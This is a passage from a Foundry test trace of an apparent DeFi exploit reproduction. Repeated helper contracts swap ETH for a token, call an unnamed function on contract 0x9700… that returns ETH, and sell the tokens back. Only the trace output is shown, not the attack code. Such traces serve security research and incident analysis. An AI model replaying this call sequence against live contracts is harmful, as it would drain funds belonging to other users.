    │   │   │   ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: Money: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xacc69378ec18e7720f0a79129cf964087b12ea0a83df694bde27c9182fab7699: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [89795] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactETHForTokens{value: 199900000000000000000}(0, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676], Money: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 1708702883 [1.708e9])
    │   │   │   │   ├─ [504] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4687509937301421443628459384 [4.687e27], 55483218624732945415 [5.548e19], 1708702883 [1.708e9]
    │   │   │   │   ├─ [21974] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::deposit{value: 199900000000000000000}()
    │   │   │   │   │   ├─ emit Deposit(dst: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, wad: 199900000000000000000 [1.999e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 0x00000000000000000000000000000000000000000000000ad62b76e268960000
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0xC2C701110dE2b9503E98619d9c9e3017877b0f72, 199900000000000000000 [1.999e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, to: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, value: 199900000000000000000 [1.999e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0x00000000000000000000000000000000000000000000000ad62b76e268960000 → 0
    │   │   │   │   │   │   @ 0x7bef77c31785d26b528aabfd5085ccf57f954814dd85cc8f2e0ddaf5453e36c1: 0x00000000000000000000000000000000000000000000000301fbfd60628b5c07 → 0x00000000000000000000000000000000000000000000000dd8277442cb215c07
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [49790] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::swap(3666729079651172828896552490 [3.666e27], 0, Money: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 0x)
    │   │   │   │   │   ├─ [36197] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transfer(Money: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 3666729079651172828896552490 [3.666e27])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, to: Money: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], value: 3666729079651172828896552490 [3.666e27])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xd0cb40c1b55ff58c304a2bbfb6ba3a3983ede1f87af5e4f4b0e632a3f4faee36: 0 → 0x00000000000000000000000000000000000000000bd90c15b4244b10113fe62a
    │   │   │   │   │   │   │   @ 14: 16351 → 16352
    │   │   │   │   │   │   │   @ 0xbda5c3b0e636d87e9689db6e66a16c5dea6d4bc5a1a7a9f0e242006b64cce914: 0x00000000000000000000000000000000000000000f256ad6e0e409d6bb4ce578 → 0x0000000000000000000000000000000000000000034c5ec12cbfbec6aa0cff4e
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1020780857650248614731906894 [1.02e27]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 255383218624732945415 [2.553e20]
    │   │   │   │   │   ├─ emit Sync(reserve0: 1020780857650248614731906894 [1.02e27], reserve1: 255383218624732945415 [2.553e20])
    │   │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 199900000000000000000 [1.999e20], amount0Out: 3666729079651172828896552490 [3.666e27], amount1Out: 0, to: Money: [0x2e234DAe75C793f67A35089C9d99245E1C58470b])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x65d8bca300000000000301fbfd60628b5c0700000f256ad6e0e409d6bb4ce578 → 0x65d8bca300000000000dd8277442cb215c070000034c5ec12cbfbec6aa0cff4e
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] [199900000000000000000 [1.999e20], 3666729079651172828896552490 [3.666e27]]
    │   │   │   ├─ [25266] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::approve(0x9700204D77A67A18eA8F1B47275897b21e5eFA97, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: Money: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], spender: 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb8fd6fffb7ccc61dc269d31833ba2379a31b2cabc48975db2fe0766c06e711af: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [164796] 0x9700204D77A67A18eA8F1B47275897b21e5eFA97::72c4cff6{value: 20000000000000000}(0000000000000000000000000d505c03d30e65f6e9b4ef88855a47a89e4b76760000000000000000000000000000000000000000001908f29f1e5e61dde00000)
    │   │   │   │   ├─ [12130] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transferFrom(Money: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, 30265400000000000000000000 [3.026e25])
    │   │   │   │   │   ├─ emit Transfer(from: Money: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], to: 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, value: 30265400000000000000000000 [3.026e25])
    │   │   │   │   │   ├─ emit Approval(owner: Money: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], spender: 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, value: 115792089237316195423570985008687907853269984665640533774057584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xd0cb40c1b55ff58c304a2bbfb6ba3a3983ede1f87af5e4f4b0e632a3f4faee36: 0x00000000000000000000000000000000000000000bd90c15b4244b10113fe62a → 0x00000000000000000000000000000000000000000bc003231505ecae335fe62a
    │   │   │   │   │   │   @ 0xf2f990490f98f333693ac7d75623d20de79f35ab79b3d154d003025f90e2b764: 0x000000000000000000000000000000000000000000cf5c6661ea0069dde00000 → 0x000000000000000000000000000000000000000000e8655901085ecbbbc00000
    │   │   │   │   │   │   @ 0xb8fd6fffb7ccc61dc269d31833ba2379a31b2cabc48975db2fe0766c06e711af: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffe6f70d60e1a19e221fffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [564] 0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f::getPair(0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72
    │   │   │   │   ├─ [504] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 1020780857650248614731906894 [1.02e27], 255383218624732945415 [2.553e20], 1708702883 [1.708e9]
    │   │   │   │   ├─ [381] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::token0() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676
    │   │   │   │   ├─ [0] Money::fallback{value: 3596663988497626826}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x405787fa12a823e0f2b7631cc41b3ba8828b3321ca811111fa75cd3aa3bb5ad8: 0 → 0x0000000000000000000000002e234dae75c793f67a35089c9d99245e1c58470b
    │   │   │   │   │   @ 0x171178a4a36bf6aaabfe415b610bea4179a07d341d8e87c83a85a194ff11dfe2: 0 → 0x0000000000000000000000000000000000000000000000000000000065d8bca3
    │   │   │   │   │   @ 2: 10 → 11
    │   │   │   │   │   @ 0x171178a4a36bf6aaabfe415b610bea4179a07d341d8e87c83a85a194ff11dfde: 0 → 0x0000000000000000000000000d505c03d30e65f6e9b4ef88855a47a89e4b7676
    │   │   │   │   │   @ 0xb8fd6fffb7ccc61dc269d31833ba2379a31b2cabc48975db2fe0766c06e711af: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffe6f70d60e1a19e221fffff
    │   │   │   │   │   @ 0x171178a4a36bf6aaabfe415b610bea4179a07d341d8e87c83a85a194ff11dfdf: 0 → 0x0000000000000000000000000000000000000000001908f29f1e5e61dde00000
    │   │   │   │   │   @ 0x171178a4a36bf6aaabfe415b610bea4179a07d341d8e87c83a85a194ff11dfe0: 0 → 0x000000000000000000000000000000000000000000000000348a7076ff9f2c33
    │   │   │   │   │   @ 0x171178a4a36bf6aaabfe415b610bea4179a07d341d8e87c83a85a194ff11dfe1: 0 → 0x0000000000000000000000000000000000000000000000000000000065e5eba3
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(Money: [0x2e234DAe75C793f67A35089C9d99245E1C58470b]) [staticcall]
    │   │   │   │   └─ ← [Return] 3636463679651172828896552490 [3.636e27]
    │   │   │   ├─ [28771] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3636463679651172828896552490 [3.636e27])
    │   │   │   │   ├─ emit Transfer(from: Money: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3636463679651172828896552490 [3.636e27])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000bc003231505ecae335fe62a
    │   │   │   │   │   @ 0xd0cb40c1b55ff58c304a2bbfb6ba3a3983ede1f87af5e4f4b0e632a3f4faee36: 0x00000000000000000000000000000000000000000bc003231505ecae335fe62a → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [41] ContractTest::fallback{value: 3676663988497626826}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 36: 0 → 0x000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2
    │   │   │   │   @ 31: 0 → 0x00000000000000000000007109709ecfa91a80626ff3989d68f67f5b1dd12d01
    │   │   │   │   @ 37: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   @ 12: 0 → 1
    │   │   │   │   @ 33: 0 → 0x0000000000000000000000000d505c03d30e65f6e9b4ef88855a47a89e4b7676
    │   │   │   │   @ 0xb8fd6fffb7ccc61dc269d31833ba2379a31b2cabc48975db2fe0766c06e711af: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   @ 35: 0 → 0x00000000000000000000000055d398326f99059ff775485246999027b3197955
    │   │   │   │   @ 0: 2 → 1
    │   │   │   │   @ 0xacc69378ec18e7720f0a79129cf964087b12ea0a83df694bde27c9182fab7699: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   @ 32: 0 → 0x0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
    │   │   │   │   @ 34: 0 → 0x0000000000000000000000009700204d77a67a18ea8f1b47275897b21e5efa97
    │   │   │   └─ ← [Return] 8811 bytes of code
    │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 3636463679651172828896552490 [3.636e27]
    │   │   ├─ [3266] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0xfffffffffffffffffffffffffffffffffffffffff4250526a729a7b5eca2df93 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [38847] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForTokens(3636463679651172828896552490 [3.636e27], 0, [0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1708703003 [1.708e9])
    │   │   │   ├─ [504] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 1020780857650248614731906894 [1.02e27], 255383218624732945415 [2.553e20], 1708702883 [1.708e9]
    │   │   │   ├─ [13739] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, 3636463679651172828896552490 [3.636e27])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, value: 3636463679651172828896552490 [3.636e27])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665636927575777932835084233087445 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffff43ffcdceafa1351cca019d5
    │   │   │   │   │   @ 0xbda5c3b0e636d87e9689db6e66a16c5dea6d4bc5a1a7a9f0e242006b64cce914: 0x0000000000000000000000000000000000000000034c5ec12cbfbec6aa0cff4e → 0x00000000000000000000000000000000000000000f0c61e441c5ab74dd6ce578
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000bc003231505ecae335fe62a → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [16855] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::swap(0, 199276568387300924087 [1.992e20], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199276568387300924087 [1.992e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199276568387300924087 [1.992e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x7bef77c31785d26b528aabfd5085ccf57f954814dd85cc8f2e0ddaf5453e36c1: 0x00000000000000000000000000000000000000000000000dd8277442cb215c07 → 0x0000000000000000000000000000000000000000000000030aa2dd200b38c150
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000015a531d58aa55bf173 → 0x00000000000000000000000000000000000000000000002072b66cad65448c2a
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   └─ ← [Return] 4657244537301421443628459384 [4.657e27]
    │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   └─ ← [Return] 56106650237432021328 [5.61e19]
    │   │   │   │   ├─ emit Sync(reserve0: 4657244537301421443628459384 [4.657e27], reserve1: 56106650237432021328 [5.61e19])
    │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 3636463679651172828896552490 [3.636e27], amount1In: 0, amount0Out: 0, amount1Out: 199276568387300924087 [1.992e20], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x65d8bca300000000000dd8277442cb215c070000034c5ec12cbfbec6aa0cff4e → 0x65d8bca30000000000030aa2dd200b38c15000000f0c61e441c5ab74dd6ce578
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return] [3636463679651172828896552490 [3.636e27], 199276568387300924087 [1.992e20]]
    │   │   ├─ [2305350] → new Money@0xF62849F9A0B5Bf2913b396098F7c7019b51A820a
    │   │   │   ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: Money: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x3c72b19ccd66922f145216e0475d8a4e01a991d43ea215cf51becd2813e8515f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [89795] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactETHForTokens{value: 199900000000000000000}(0, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676], Money: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], 1708702883 [1.708e9])
    │   │   │   │   ├─ [504] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4657244537301421443628459384 [4.657e27], 56106650237432021328 [5.61e19], 1708702883 [1.708e9]
    │   │   │   │   ├─ [21974] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::deposit{value: 199900000000000000000}()
    │   │   │   │   │   ├─ emit Deposit(dst: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, wad: 199900000000000000000 [1.999e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 0x00000000000000000000000000000000000000000000000ad62b76e268960000
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0xC2C701110dE2b9503E98619d9c9e3017877b0f72, 199900000000000000000 [1.999e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, to: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, value: 199900000000000000000 [1.999e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0x00000000000000000000000000000000000000000000000ad62b76e268960000 → 0
    │   │   │   │   │   │   @ 0x7bef77c31785d26b528aabfd5085ccf57f954814dd85cc8f2e0ddaf5453e36c1: 0x0000000000000000000000000000000000000000000000030aa2dd200b38c150 → 0x00000000000000000000000000000000000000000000000de0ce540273cec150
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [49790] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::swap(3634162001443845025773037361 [3.634e27], 0, Money: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], 0x)
    │   │   │   │   │   ├─ [36197] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transfer(Money: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], 3634162001443845025773037361 [3.634e27])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, to: Money: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], value: 3634162001443845025773037361 [3.634e27])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xbda5c3b0e636d87e9689db6e66a16c5dea6d4bc5a1a7a9f0e242006b64cce914: 0x00000000000000000000000000000000000000000f0c61e441c5ab74dd6ce578 → 0x0000000000000000000000000000000000000000034e462766831d9fda423e47
    │   │   │   │   │   │   │   @ 0x3d76c6985e66b7484bab90b51b1d44f6e45a807dc0aeaaa0ca2d3a6a42e6df46: 0 → 0x00000000000000000000000000000000000000000bbe1bbcdb428dd5032aa731
    │   │   │   │   │   │   │   @ 14: 16352 → 16353
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1023082535857576417855422023 [1.023e27]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 256006650237432021328 [2.56e20]
    │   │   │   │   │   ├─ emit Sync(reserve0: 1023082535857576417855422023 [1.023e27], reserve1: 256006650237432021328 [2.56e20])
    │   │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 199900000000000000000 [1.999e20], amount0Out: 3634162001443845025773037361 [3.634e27], amount1Out: 0, to: Money: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x65d8bca30000000000030aa2dd200b38c15000000f0c61e441c5ab74dd6ce578 → 0x65d8bca300000000000de0ce540273cec1500000034e462766831d9fda423e47
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] [199900000000000000000 [1.999e20], 3634162001443845025773037361 [3.634e27]]
    │   │   │   ├─ [25266] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::approve(0x9700204D77A67A18eA8F1B47275897b21e5eFA97, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: Money: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], spender: 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x30543003f4c3d50f45b48460271f5046363b61f46fb5bc4ab9cc52c1542f34c3: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [164796] 0x9700204D77A67A18eA8F1B47275897b21e5eFA97::72c4cff6{value: 20000000000000000}(0000000000000000000000000d505c03d30e65f6e9b4ef88855a47a89e4b76760000000000000000000000000000000000000000001908f29f1e5e61dde00000)
    │   │   │   │   ├─ [12130] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transferFrom(Money: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, 30265400000000000000000000 [3.026e25])
    │   │   │   │   │   ├─ emit Transfer(from: Money: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], to: 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, value: 30265400000000000000000000 [3.026e25])
    │   │   │   │   │   ├─ emit Approval(owner: Money: [0xF62849F9A0B5Bf2913b396098F7c7019b51A820a], spender: 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, value: 115792089237316195423570985008687907853269984665640533774057584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xf2f990490f98f333693ac7d75623d20de79f35ab79b3d154d003025f90e2b764: 0x000000000000000000000000000000000000000000e8655901085ecbbbc00000 → 0x000000000000000000000000000000000000000001016e4ba026bd2d99a00000
    │   │   │   │   │   │   @ 0x3d76c6985e66b7484bab90b51b1d44f6e45a807dc0aeaaa0ca2d3a6a42e6df46: 0x00000000000000000000000000000000000000000bbe1bbcdb428dd5032aa731 → 0x00000000000000000000000000000000000000000ba512ca3c242f73254aa731
    │   │   │   │   │   │   @ 0x30543003f4c3d50f45b48460271f5046363b61f46fb5bc4ab9cc52c1542f34c3: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffe6f70d60e1a19e221fffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [564] 0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f::getPair(0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72
    │   │   │   │   ├─ [504] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 1023082535857576417855422023 [1.023e27], 256006650237432021328 [2.56e20], 1708702883 [1.708e9]
    │   │   │   │   ├─ [381] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::token0() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676
    │   │   │   │   ├─ [0] Money::fallback{value: 3597332683585103419}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xfba5f2a1d830a190559ca7c469880ec8ec6153f76bb7199166474d995a756351: 0 → 0x0000000000000000000000000d505c03d30e65f6e9b4ef88855a47a89e4b7676
    │   │   │   │   │   @ 0xfba5f2a1d830a190559ca7c469880ec8ec6153f76bb7199166474d995a756353: 0 → 0x000000000000000000000000000000000000000000000000348cf0a60f267916
    │   │   │   │   │   @ 0xfba5f2a1d830a190559ca7c469880ec8ec6153f76bb7199166474d995a756352: 0 → 0x0000000000000000000000000000000000000000001908f29f1e5e61dde00000
    │   │   │   │   │   @ 0x405787fa12a823e0f2b7631cc41b3ba8828b3321ca811111fa75cd3aa3bb5ad9: 0 → 0x000000000000000000000000f62849f9a0b5bf2913b396098f7c7019b51a820a
    │   │   │   │   │   @ 2: 11 → 12
    │   │   │   │   │   @ 0x30543003f4c3d50f45b48460271f5046363b61f46fb5bc4ab9cc52c1542f34c3: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffe6f70d60e1a19e221fffff
    │   │   │   │   │   @ 0xfba5f2a1d830a190559ca7c469880ec8ec6153f76bb7199166474d995a756355: 0 → 0x0000000000000000000000000000000000000000000000000000000065d8bca3
